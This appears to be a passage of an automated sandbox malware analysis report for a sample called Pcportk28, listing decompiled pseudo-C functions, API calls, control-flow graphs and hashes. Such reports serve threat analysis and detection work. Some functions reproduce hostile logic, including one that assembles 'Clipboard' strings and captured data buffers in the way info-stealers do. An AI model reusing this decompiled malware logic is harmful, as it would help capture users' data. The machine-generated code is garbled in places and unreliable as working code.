                                                0x00000000
                                                0x0040895e
                                                0x00408962
                                                0x00000000
                                                0x00000000
                                                0x00408964
                                                0x00000000
                                                0x00408962
                                                0x00408966
                                                0x00408969
                                                0x0040896f
                                                0x00408971
                                                0x0040897c
                                                0x00408981
                                                0x00408984
                                                0x0040898f
                                                0x00408990
                                                0x00408991
                                                0x0040899c
                                                0x0040899e
                                                0x004089a4
                                                0x004089a8
                                                0x004089ab
                                                0x004089ab
                                                0x004089b2
                                                0x004089b5
                                                0x004089ba
                                                0x004089c7
                                                0x004088f6
                                                0x004088f6
                                                0x004088f6

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_Pcportk28.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                                                • Instruction ID: a66f789b9c9346c4209e30225a072a2b07741faaa143dbde407d40e20ce1c0b9
                                                • Opcode Fuzzy Hash: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                                                • Instruction Fuzzy Hash: BD21FBB2C4420957CB15E6649E42BFF737C9B54304F04057FE989A3181F639AB4987A7
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004188B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 3 4188b0-4188e1 call 4191e0 RtlAllocateHeap
                                                C-Code - Quality: 100%
                                                			E004188B0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E004191E0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413536
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}





                                                0x004188c7
                                                0x004188d2
                                                0x004188dd
                                                0x004188e1

                                                APIs
                                                • RtlAllocateHeap.NTDLL(65A,?,00413CAF,00413CAF,?,00413536,?,?,?,?,?,00000000,00408B13,?), ref: 004188DD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_Pcportk28.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID: 65A
                                                • API String ID: 1279760036-2085483392
                                                • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                • Instruction ID: 6af236cfb772a66706e6e9b9d52e602bd21d3a4cd2a65313634d6b12f98b32f7
                                                • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                • Instruction Fuzzy Hash: BDE012B1200208ABDB14EF99CC45EA777ACAF88654F118559FA085B242CA30F910CAB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00407253, Relevance: 1.6, APIs: 1, Instructions: 60threadwindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 282 407253-40725b 283 4072b8-4072ca call 413e50 282->283 284 40725d-40725e 282->284 294 4072cc-4072da PostThreadMessageW 283->294 295 4072fe-407302 283->295 286 407260-40727d call 419b20 call 4199d0 284->286 287 40729c-40729f 284->287 289 4072a1-4072b3 call 409b40 287->289 290 4072db-4072de 287->290 289->283 296 4072e0-4072fa call 4092a0 290->296 297 4072fd 290->297 294->290 296->297 297->295
                                                C-Code - Quality: 62%
                                                			E00407253(void* __ecx, void* __edx, void* __eflags) {
				int _t11;
				void* _t13;
				void* _t14;
				int _t20;
				long _t21;
				void* _t30;
				void* _t32;
				void* _t33;

				asm("les edi, [edx+0x463bc095]");
				_pop(_t21);
				asm("loop 0x5d");
				_t33 = _t32 + 1;
				if(__eflags >= 0) {
					_t20 = __edx +  *((intOrPtr*)(__ecx - 0x18));
					__eflags = _t20;
					if(__eflags >= 0) {
						L5:
						asm("salc"); // executed
						__eflags = _t11;
						if(__eflags == 0) {
							_push(_t11);
							_t11 = E004092A0(__eflags, 1, 8) & 0x000000ff;
							_push(_t30 + _t11 - 0x40);
							_push(0x8003);
							 *((intOrPtr*)(_t21 - 1)) =  *((intOrPtr*)(_t21 - 1)) + _t20;
							asm("salc");
						}
					} else {
						 *_t11 =  *_t11 + _t11;
						_t20 = _t30 - 0x40;
						_t13 = E00409B40(__eflags,  *((intOrPtr*)(_t30 + 8)) + 0x1c, _t20); // executed
						_t11 = E00413E50( *((intOrPtr*)(_t30 + 8)) + 0x1c, _t13, 0, 0, 0xc4e7b6d6);
						_t33 = _t33 + 0x30;
						__eflags = _t11;
						if(_t11 != 0) {
							_push(_t21);
							_t21 =  *(_t30 + 0xc);
							_t11 = PostThreadMessageW(_t21, 0x111, 0, 0);
							goto L5;
						}
					}
					return _t11;
				} else {
					_push(_t23);
					_t14 = E00419B20(_t11, __ecx, 0x11c6f95e);
					return E004199D0(__ecx) + _t14 + 0x1000;
				}
			}











                                                0x00407253
                                                0x00407259
                                                0x0040725b
                                                0x0040725d
                                                0x0040725e
                                                0x0040729c
                                                0x0040729c
                                                0x0040729f
                                                0x004072db
                                                0x004072db
                                                0x004072dc
                                                0x004072de
                                                0x004072e0
                                                0x004072ea
                                                0x004072f4
                                                0x004072f5
                                                0x004072f9
                                                0x004072fc
                                                0x004072fc
                                                0x004072a1
                                                0x004072a1
                                                0x004072a6
                                                0x004072ae
                                                0x004072be
                                                0x004072c5
                                                0x004072c8
                                                0x004072ca
                                                0x004072cc
                                                0x004072cd
                                                0x004072da
                                                0x00000000
                                                0x004072da
                                                0x004072ca
                                                0x00407302
                                                0x00407260
                                                0x00407260
                                                0x00407266
                                                0x0040727d
                                                0x0040727d

                                                APIs
                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_Pcportk28.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: 52408c0a9d3e33ca3b15a549146ed3cc27fcc96a1c1cffd4213f1bc2a9849977
                                                • Instruction ID: e7f31090fd5cce6b4cbcb140759b42763e89decaf705f09c70cea09fb1590630
                                                • Opcode Fuzzy Hash: 52408c0a9d3e33ca3b15a549146ed3cc27fcc96a1c1cffd4213f1bc2a9849977
                                                • Instruction Fuzzy Hash: DB014972E4022477DB20A5529C02FEF3318AB40B14F1500BEFE08BA1C2E6787D0682EA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00407280, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 303 407280-4072ad call 41a140 call 41ad20 308 4072b3-4072ca call 413e50 303->308 309 4072ae call 409b40 303->309 313 4072cc-4072de PostThreadMessageW 308->313 314 4072fe-407302 308->314 309->308 316 4072e0-4072fa call 4092a0 313->316 317 4072fd 313->317 316->317 317->314
                                                C-Code - Quality: 71%
                                                			E00407280(void* __edx, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				int _t13;
				void* _t15;
				void* _t16;
				void* _t19;
				char* _t20;
				long _t21;
				void* _t26;
				void* _t27;

				_t19 = __edx;
				_v68 = 0;
				_t13 = E0041A140( &_v67, 0, 0x3f);
				_push(3);
				_t20 = _t19 +  *((intOrPtr*)( &_v68 - 0x18));
				_t29 = _t20;
				if(_t20 >= 0) {
					L4:
					asm("salc"); // executed
					_t31 = _t13;
					if(_t13 != 0) {
						L7:
						return _t13;
					}
					_push(_t13);
					_t13 = E004092A0(_t31, 1, 8) & 0x000000ff;
					_push(_t26 + _t13 - 0x40);
					_push(0x8003);
					 *((intOrPtr*)(_t21 - 1)) =  *((intOrPtr*)(_t21 - 1)) + _t20;
					asm("salc");
					goto L7;
				}
				 *_t13 =  *_t13 + _t13;
				_t20 =  &_v68;
				_t15 = E00409B40(_t29, _a4 + 0x1c, _t20); // executed
				_t16 = E00413E50(_a4 + 0x1c, _t15, 0, 0, 0xc4e7b6d6);
				_t27 = _t27 + 0x30;
				if(_t16 != 0) {
					_push(_t21);
					_t21 = _a8;
					_t13 = PostThreadMessageW(_t21, 0x111, 0, 0);
					goto L4;
				}
				return _t16;
			}













                                                0x00407280
                                                0x0040728f
                                                0x00407293
                                                0x0040729b
                                                0x0040729c
                                                0x0040729c
                                                0x0040729f
                                                0x004072db
                                                0x004072db
                                                0x004072dc
                                                0x004072de
                                                0x004072fd
                                                0x00000000
                                                0x004072fd
                                                0x004072e0
                                                0x004072ea
                                                0x004072f4
                                                0x004072f5
                                                0x004072f9
                                                0x004072fc
                                                0x00000000
                                                0x004072fc
                                                0x004072a1
                                                0x004072a6
                                                0x004072ae
                                                0x004072be
                                                0x004072c5
                                                0x004072ca
                                                0x004072cc
                                                0x004072cd
                                                0x004072da
                                                0x00000000
                                                0x004072da
                                                0x00407302

                                                APIs
                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_Pcportk28.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                                • Instruction ID: 93bd109d16e53c8762968f959fe3c9c023db94cb098c15d1529cbaaabdda2f39
                                                • Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                                • Instruction Fuzzy Hash: F001D431A8022977E720AA959C03FFE772C5B00B55F04006EFF04BA1C2E6A8790542EA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004189F6, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 320 4189f6-4189ff 321 418a01-418a40 call 4191e0 320->321 322 418a56-418a6a call 4191e0 320->322 325 418a6f-418a84 LookupPrivilegeValueW 322->325
                                                C-Code - Quality: 16%
                                                			E004189F6(signed int __ebx, void* _a4, void* _a8, void* _a12, void* _a16, void* _a20, void* _a24, void* _a28) {

				asm("sbb dl, al");
				asm("aas");
				if ((__ebx ^  *0x4c0fd0fb) < 0) goto L3;
			}



                                                0x004189fc
                                                0x004189fe
                                                0x004189ff

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_Pcportk28.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: 921f58360fb0b5e683cb42f9298b62af2d9d37aed50ad0dbf8b0104d7f8d69d3
                                                • Instruction ID: a01d6cd2099b129e91d480fc493c4c15b271880968f934ea6dd2ae2eca83370f
                                                • Opcode Fuzzy Hash: 921f58360fb0b5e683cb42f9298b62af2d9d37aed50ad0dbf8b0104d7f8d69d3
                                                • Instruction Fuzzy Hash: 400169B5200209AFDB14DF99DC84EEB37ADEF88350F018159FA0CA7242CA34E954CBB4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00418A41, Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 352 418a41-418a69 353 418a6f-418a84 LookupPrivilegeValueW 352->353 354 418a6a call 4191e0 352->354 354->353
                                                C-Code - Quality: 53%
                                                			E00418A41(void* __eax, void* __ebx, void* __edx, void* __edi, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				intOrPtr _v0;
				intOrPtr _t10;
				int _t13;

				asm("aam 0x71");
				_t22 = __edi -  *((intOrPtr*)(__edx - 0x7e));
				_push(__edi -  *((intOrPtr*)(__edx - 0x7e)));
				asm("sbb eax, 0x8bec8b55");
				_t10 = _v0;
				E004191E0(_t22, _t10, _t10 + 0xc8c,  *((intOrPtr*)(_t10 + 0xa18)), 0, 0x46);
				_t13 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t13;
			}






                                                0x00418a41
                                                0x00418a43
                                                0x00418a48
                                                0x00418a4f
                                                0x00418a53
                                                0x00418a6a
                                                0x00418a80
                                                0x00418a84

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_Pcportk28.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: 366181999b52ce1b1f9812b49231122a7ac89ad237904e7c7f55fe723dd0b10f
                                                • Instruction ID: 421726a2e665cf02d85752c26b7cbf2ca668620b504d320a260c99851f3fe134
                                                • Opcode Fuzzy Hash: 366181999b52ce1b1f9812b49231122a7ac89ad237904e7c7f55fe723dd0b10f
                                                • Instruction Fuzzy Hash: 19E0E5752041056FDB00DF6ADC85E977B69EF81250F00465EF88957106C534A445C7B4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004188F0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 355 4188f0-418921 call 4191e0 RtlFreeHeap
                                                C-Code - Quality: 79%
                                                			E004188F0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				asm("in al, dx");
				_t7 = _a4;
				_t3 = _t7 + 0xc74; // 0xc74
				E004191E0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                0x004188f2
                                                0x004188f3
                                                0x004188ff
                                                0x00418907
                                                0x0041891d
                                                0x00418921

                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_Pcportk28.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID:
                                                • API String ID: 3298025750-0
                                                • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                • Instruction ID: 4eb6e808868848e44fc4af0a2d328e43ee2ba6839a30e24a5e1d9ea2c08b961d
                                                • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                • Instruction Fuzzy Hash: 6BE012B1200209ABDB18EF99CC49EA777ACAF88750F018559FA085B242CA30E910CAB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00418A50, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00418A50(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				intOrPtr _t7;
				int _t10;
				void* _t15;

				_t7 = _a4;
				E004191E0(_t15, _t7, _t7 + 0xc8c,  *((intOrPtr*)(_t7 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}






                                                0x00418a53
                                                0x00418a6a
                                                0x00418a80
                                                0x00418a84

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_Pcportk28.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                • Instruction ID: 6b795ac81b365ad13cf9f2a9b204a9737006b755962b409e964d21a2d06fa60d
                                                • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                • Instruction Fuzzy Hash: 62E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FA0857241C934E950CBF5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004188F2, Relevance: 1.5, APIs: 1, Instructions: 23memoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 79%
                                                			E004188F2() {
				char _t10;
				void* _t15;
				void* _t19;

				asm("in al, dx");
				_t7 =  *((intOrPtr*)(_t19 + 8));
				_t3 = _t7 + 0xc74; // 0xc74
				E004191E0(_t15,  *((intOrPtr*)(_t19 + 8)), _t3,  *((intOrPtr*)( *((intOrPtr*)(_t19 + 8)) + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap( *(_t19 + 0xc),  *(_t19 + 0x10),  *(_t19 + 0x14)); // executed
				return _t10;
			}






                                                0x004188f2
                                                0x004188f3
                                                0x004188ff
                                                0x00418907
                                                0x0041891d
                                                0x00418921

                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_Pcportk28.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID:
                                                • API String ID: 3298025750-0
                                                • Opcode ID: 1003f38348de91aff8aad5e4e63cc2b9c0e10c34f63be8fed3bedb6f3b3b3e34
                                                • Instruction ID: 81d35264b95f37ae67e372158a4015b08c98f7621b2b45835833e9d944f4090c
                                                • Opcode Fuzzy Hash: 1003f38348de91aff8aad5e4e63cc2b9c0e10c34f63be8fed3bedb6f3b3b3e34
                                                • Instruction Fuzzy Hash: 3DE046B1200205BFDB18DF69CC48EE73768EF88350F018659F90C9B241C631E910CAB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00418924, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 33%
                                                			E00418924(intOrPtr _a4, int _a8) {
				void* _t13;

				asm("movsb");
				0x8b978723();
				_t8 = _a4;
				E004191E0(_t13, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t8 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                0x00418929
                                                0x0041892d
                                                0x00418933
                                                0x0041894a
                                                0x00418958

                                                APIs
                                                • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418958
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_Pcportk28.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: 5296c33d7f4fd38c0e184ded7b2dca68b0af8eb8d3a1445ecce078fbee8a850e
                                                • Instruction ID: f8961e69efa8a9b1a051e914a6d41aff56988d4c8773a7e1b39e283bf2ea7379
                                                • Opcode Fuzzy Hash: 5296c33d7f4fd38c0e184ded7b2dca68b0af8eb8d3a1445ecce078fbee8a850e
                                                • Instruction Fuzzy Hash: E5E0CD302002017FD320DF69CC85FC73B649F583A0F418664B9699B2E2C531EA41C695
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00418930, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00418930(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E004191E0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                0x00418933
                                                0x0041894a
                                                0x00418958

                                                APIs
                                                • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418958
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_Pcportk28.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                • Instruction ID: c6ffa8f41277cedcd146721b33de4ab2dd662f0a832426917f21051448e796de
                                                • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                • Instruction Fuzzy Hash: 90D012716042147BD620DB99CC85FD7779CDF48790F018065FA1C5B241C531BA00C6E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 008626F8, Relevance: .0, Instructions: 44COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                • Instruction ID: 003a916221f8a0ce374a44117b8fbe88b89a524691b6392432483a5b9729c210
                                                • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                • Instruction Fuzzy Hash: 96F022203248499BDB48EB188C55E6A33D5FBA4300F69C0B8ED49C7341D631ED008291
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041565B, Relevance: .0, Instructions: 32COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 53%
                                                			E0041565B(void* __eax, void* __ecx, signed int __edx, void* __edi, void* __esi, void* __fp0) {
				intOrPtr* _t16;
				void* _t25;
				signed int _t27;

				_t7 = __eax;
				_t1 = _t25 + 0x3d201314;
				 *_t1 =  *(_t25 + 0x3d201314) & _t27;
				if( *_t1 >= 0) {
					_t25 = _t25 + 1;
					asm("sbb al, 0x9a");
					 *__edx =  *__edx | __edx;
					asm("outsb");
					asm("cmpsb");
					_pop(_t16);
					_t7 = 0xd28c93b1;
					 *_t16 =  *_t16 + __esi;
					asm("sbb [ebp-0x45], edi");
					 *((char*)(__edx + 0x4a)) =  *((char*)(__edx + 0x4a)) + 1;
				}
				asm("pushad");
				return _t7;
			}






                                                0x0041565b
                                                0x0041565b
                                                0x0041565b
                                                0x00415661
                                                0x00415663
                                                0x00415664
                                                0x00415669
                                                0x00415673
                                                0x00415675
                                                0x00415678
                                                0x00415679
                                                0x0041567e
                                                0x00415681
                                                0x00415684
                                                0x00415687
                                                0x00415689
                                                0x00415696

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_Pcportk28.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4498b939d477bdd831384b705a897eefb9f297ce36748400b64d47ebfcc829f1
                                                • Instruction ID: 767547cde68b77bae2faa2b87bd6e48cd130564548972f7abff9d9c339430fbb
                                                • Opcode Fuzzy Hash: 4498b939d477bdd831384b705a897eefb9f297ce36748400b64d47ebfcc829f1
                                                • Instruction Fuzzy Hash: D1E0C077E4D1454BD3074920A9000F0BB71FD8323572821CFDC087B281E60A444F53C6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00406AB6, Relevance: .0, Instructions: 20COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 44%
                                                			E00406AB6(void* __eax, void* __ebx, void* __ecx, intOrPtr _a4, intOrPtr* _a8) {
				short _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				short _v34;
				short _v38;
				short _v42;
				short _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				void* _t39;
				intOrPtr _t68;
				intOrPtr _t84;
				void* _t91;
				void* _t93;
				void* _t95;
				void* _t96;

				if(__ebx != 0xd6) {
					asm("int3");
					asm("int3");
					_t39 = E0041A3B0(_a8);
					_t93 = _t91 - 0x3c + 4;
					if(_t39 <= 0x1000) {
						_t84 = _a4;
						_t68 =  *((intOrPtr*)(_t84 + 0x7d8));
						if(_t68 != 0) {
							_push(__ebx);
							_t79 = _t39 + _t39;
							_t61 = _t68 + 0x1ff56c;
							_t39 = E0041A3D0(_a8, _t68 + 0x1ff56c, _t39 + _t39);
							_t95 = _t93 + 0xc;
							if(_t39 == 0) {
								E0041A0C0(_t61, _a8, _t79);
								_t96 = _t95 + 0xc;
								_v8 = 0;
								_t63 = _t84 + 0x4464;
								_v16 = 0xa000d;
								_v12 = 0xa000d;
								_v64 = 0x6c0043;
								_v60 = 0x700069;
								_v56 = 0x6f0062;
								_v52 = 0x720061;
								_v48 = 0x64;
								_v44 = 0;
								_v42 = 0;
								_v38 = 0;
								_v34 = 0;
								 *((intOrPtr*)( *((intOrPtr*)(_t84 + 0xcc0))))(_t84 + 0x4464, 0x104);
								 *((intOrPtr*)( *((intOrPtr*)(_t84 + 0xcbc))))(0);
								if(0 <= 0x40) {
									if(0 == 0) {
										_v32 = 0x6e0055;
										_v28 = 0x6e006b;
										_v24 = 0x77006f;
										_v20 = 0x6e;
										E0041A0C0(_t63,  &_v32, 0x10);
										_t96 = _t96 + 0xc;
									}
								} else {
									 *((short*)(_t84 + 0x44e4)) = 0;
								}
								_t81 = _t84 + 0x4ce4;
								E0041A0C0(_t84 + 0x4ce4,  &_v64, 0x14);
								E0041A520(_t84 + 0x4ce4,  &_v16, 0);
								E0041A520(_t81, _t63, 0);
								E0041A520(_t81,  &_v16, 0);
								E0041A520(_t81, _a8, 0);
								 *((intOrPtr*)(_t84 + 0xa08)) = E0041A3B0(_t81) + _t50;
								E0041A0C0( *((intOrPtr*)(_t84 + 0xa04)), _t81, E0041A3B0(_t81) + _t52);
								_t39 = E0040CE10(_t84, 0x13);
							}
						}
					}
					return _t39;
				} else {
					asm("fisub word [edi+0x5f]");
					asm("pushad");
					asm("lock fild qword [edi]");
					return 1;
				}
			}


























                                                0x00406ab9
                                                0x00406ade
                                                0x00406adf
                                                0x00406aea
                                                0x00406aef
                                                0x00406af7
                                                0x00406afe
                                                0x00406b01
                                                0x00406b09
                                                0x00406b0f
                                                0x00406b11
                                                0x00406b14
                                                0x00406b20
                                                0x00406b25
                                                0x00406b2a
                                                0x00406b36
                                                0x00406b3b
                                                0x00406b47
                                                0x00406b51
                                                0x00406b58
                                                0x00406b5f
                                                0x00406b66
                                                0x00406b6d
                                                0x00406b74
                                                0x00406b7b
                                                0x00406b82
                                                0x00406b89
                                                0x00406b8d
                                                0x00406b90
                                                0x00406b93
                                                0x00406b97
                                                0x00406ba0
                                                0x00406ba5
                                                0x00406bb4
                                                0x00406bbd
                                                0x00406bc4
                                                0x00406bcb
                                                0x00406bd2
                                                0x00406bd9
                                                0x00406bde
                                                0x00406bde
